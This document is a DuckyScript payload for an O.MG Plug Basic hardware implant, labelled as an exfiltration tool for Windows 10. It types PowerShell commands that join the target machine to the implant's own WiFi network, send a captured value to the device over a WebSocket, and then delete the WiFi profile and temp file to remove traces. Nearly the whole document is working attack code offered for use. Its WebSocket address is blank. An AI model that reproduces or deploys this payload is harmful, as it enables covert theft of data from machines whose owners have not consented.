REM_BLOCK -------------------------------------------------------------------- Title: O.MG Plug Basic Local Exfiltrator Description: Exfiltrates via O.MG WebSocket API Author: thisismyrobot Target: Windows 10 (PowerShell) Version: 1.0 Category: Exfiltration Local exfiltration for O.MG Plug Basic The Basic version of the Plug cannot do stuff like sharing a local storage device (at least at the time of writing), so this code does local exfil by connecting the target to the O.MG Plug's own WiFi and using WebSockets to save data to a setting. This assumes a WiFi-enabled target of course. Retrieve the data by using the CTList custom command under Debug. Designed to work with an O.MG Plug Basic with firmware v2.5-220322. -------------------------------------------------------------------- END_REM DEFINE #PASSWORD Secret password DUCKY_LANG US DELAY 2000 DEFAULT_DELAY 500 GUI r STRINGLN powershell STRINGLN cd c:\temp REM ----------------------- REM Collect info to exfil. REM ----------------------- STRING $e = "#PASSWORD" ENTER REM ---------------------------------- REM Connect to the O.MG AP. REM ---------------------------------- STRINGLN echo 'O.MGO.MGESSWPA2PSKAESfalsepassPhrasefalse12345678' > profile.xml STRINGLN netsh wlan add profile "profile.xml" STRINGLN netsh wlan connect name=O.MG REM -------------------------------- REM Establish websocket connection. REM -------------------------------- STRINGLN $ws = New-Object Net.WebSockets.ClientWebSocket STRINGLN $ct = New-Object Threading.CancellationToken($false) STRINGLN $connectTask = $ws.ConnectAsync("ws://", $ct) STRINGLN do { Sleep(0.1) } until ($connectTask.IsCompleted) REM -------- REM Upload. REM -------- STRINGLN $ct = New-Object Threading.CancellationToken($false) STRINGLN $command = "[custom]CTSet`tcaptured`t$e" STRINGLN [ArraySegment[byte]]$msg = [Text.Encoding]::Utf8.GetBytes($command) STRINGLN $ws.SendAsync($msg, [System.Net.WebSockets.WebSocketMessageType]::Binary, $true, $ct).GetAwaiter().GetResult() DELAY 1000 REM ---------- REM Clean up. REM ---------- STRINGLN netsh wlan disconnect STRINGLN netsh wlan delete profile name="O.MG" STRINGLN del .\profile.xml STRINGLN exit